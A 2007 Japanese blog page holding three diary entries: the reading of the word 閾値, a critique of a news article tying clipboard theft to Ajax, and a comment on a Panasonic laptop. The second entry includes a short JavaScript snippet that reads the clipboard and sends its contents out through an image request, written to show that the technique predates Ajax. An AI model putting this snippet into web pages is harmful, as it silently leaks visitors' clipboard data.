水無月ばけらのえび日記

bakera.jp > 水無月ばけらのえび日記 > 2007年のえび日記 > 2007年1月 > 2007年1月18日(木曜日)

2007年1月18日(木曜日)

閾値

サブリミナルの話なんかで「識閾」という言葉が出てくると普通に「しきいき」と読んでもらえそうですし、「想像の閾を出ない」は「そうぞうのいきをでない」と読んでもらえそうなのですが、何故か「閾値」だと「いきち」と読んでくれない人がいるようで、かなり違和感があります。

もっとも、辞書には「しきいち」という読み (dictionary.goo.ne.jp)でも出ているようで、もはや誤りとは言えなくなっているようですが。

関連する話題: 日本語

なぜここで Ajax?

Ajaxの危険な一面――クリップデータの盗難に悪用可能 (techtarget.itmedia.co.jp)」……うーむ。クリップボードの内容が盗まれるという話自体は、5年も前に高木さんが指摘している (java-house.jp)ことですが……。

Ajaxが登場する前は、第三者がJavaScriptを使ってユーザーのクリップボードの情報を見ることは可能だったが、その情報を怪しまれずにサーバに送信することはできなかった。

いやいや、そんなことはないでしょう。こんなので十分ですから。

var data = clipboardData.getData("Text");
var a= new Image();
a.src = "http://bakera.jp/?" + data;

画像のプリロードは基本中の基本とも言えるテクニックです。JavaScript をいじる Web屋はみんな知っていると思いますけれど。

※もっとも、最近では画像のロールオーバーのさせ方も進化しているので、こんなコードをせこせこと書いたことのある人は減ってきているかも。

どうしてこんな文脈でわざわざ Ajax が引き合いに出されなければいけないのか分からないのですが、まあ、流行なんですかね。

関連する話題: Web / セキュリティ

新 Let's Note

落としてもこぼしても無問題──タフなLet's note R6に注目せよ (plusd.itmedia.co.jp)」。レッツノートR6 (panasonic.jp)ですか。

Let's Note はいつも興味深く思いますが、色にちょっと抵抗があるのですよね。天板の色はカスタマイズできるのですが (ただし要追加料金)、筐体全体は銀色なので。つや消しの黒のモデルなんかが出たら、かなり売れそうな気がするのですが……。

関連する話題: PC / Let's Note

最近の日記

関わった本など